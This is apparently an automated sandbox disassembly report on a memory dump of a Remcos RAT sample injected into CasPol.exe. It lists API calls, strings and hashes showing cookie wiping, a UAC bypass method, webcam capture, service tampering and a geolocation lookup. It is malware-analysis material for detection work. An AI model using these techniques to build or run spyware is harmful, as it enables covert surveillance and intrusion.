                                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                            • API String ID: 1133728706-4073444585
                                                                                                            • Opcode ID: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                            • Opcode Fuzzy Hash: 14f0f96447fa4c6e8905fe9d6b08492cf8f09b5957288703f2a69d5f87ec158c
                                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                            • Opcode Fuzzy Hash: 6a5ef57456b0df346b0486265a01e48adde46d03de536ae14a187a8f4c9f433e
                                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: P[G
                                                                                                            • API String ID: 2536120697-571123470
                                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                            APIs
                                                                                                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                            Strings
                                                                                                            • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                            • String ID: http://geoplugin.net/json.gp
                                                                                                            • API String ID: 3121278467-91888290
                                                                                                            • Opcode ID: 98fb14b2ac9156131480318ad0ac9b4491288a63bb14312046f8df13302c680a
                                                                                                            • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                            • Opcode Fuzzy Hash: 98fb14b2ac9156131480318ad0ac9b4491288a63bb14312046f8df13302c680a
                                                                                                            • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
                                                                                                            APIs
                                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                            • API String ID: 3851391207-2637227304
                                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                            APIs
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                            • String ID: H]G
                                                                                                            • API String ID: 2536120697-1717957184
                                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                            Strings
                                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                            • API String ID: 2018770650-304995407
                                                                                                            • Opcode ID: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                            • Opcode Fuzzy Hash: 9f2292de5349cbb89b874ac3832283976b5779146be5ef793b8f579563e3040a
                                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                            APIs
                                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$AllocOutputShowWindow
                                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                            • API String ID: 2425139147-2527699604
                                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$BG
                                                                                                            • API String ID: 0-3292752334
                                                                                                            • Opcode ID: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                            • Opcode Fuzzy Hash: e181011d619ffb8157927409b25ecf3a74985ff587143acc6985ebda069ccb43
                                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                            • String ID: Alarm triggered$`#v
                                                                                                            • API String ID: 614609389-3049340936
                                                                                                            • Opcode ID: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                            • Opcode Fuzzy Hash: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                            • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __cftoe
                                                                                                            • String ID:
                                                                                                            • API String ID: 4189289331-0
                                                                                                            • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                            • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                            • Opcode ID: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                            • Opcode Fuzzy Hash: a9dc0d208de5fd7d1fb00aaf9429c157d058a6ef8680621eaae3a775435586b8
                                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prologSleep
                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                            • API String ID: 3469354165-462540288
                                                                                                            • Opcode ID: fea753129d67a911db83ec9719f0726e8be355b30250b39268ef61c21add15eb
                                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                            • Opcode Fuzzy Hash: fea753129d67a911db83ec9719f0726e8be355b30250b39268ef61c21add15eb
                                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 493672254-0
                                                                                                            • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                            • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                                                                                                            • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                            • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                            • String ID:
                                                                                                            • API String ID: 3852720340-0
                                                                                                            • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                            • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                                                                                                            • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                            • _free.LIBCMT ref: 00446EF6
                                                                                                            • _free.LIBCMT ref: 00446F1E
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                            • _abort.LIBCMT ref: 00446F3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 3160817290-0
                                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                            • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                            • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                            • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                                                                                                            • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                            • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                                                                                                            • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                            • String ID:
                                                                                                            • API String ID: 221034970-0
                                                                                                            • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                            • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                                                                                                            • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                            APIs
                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
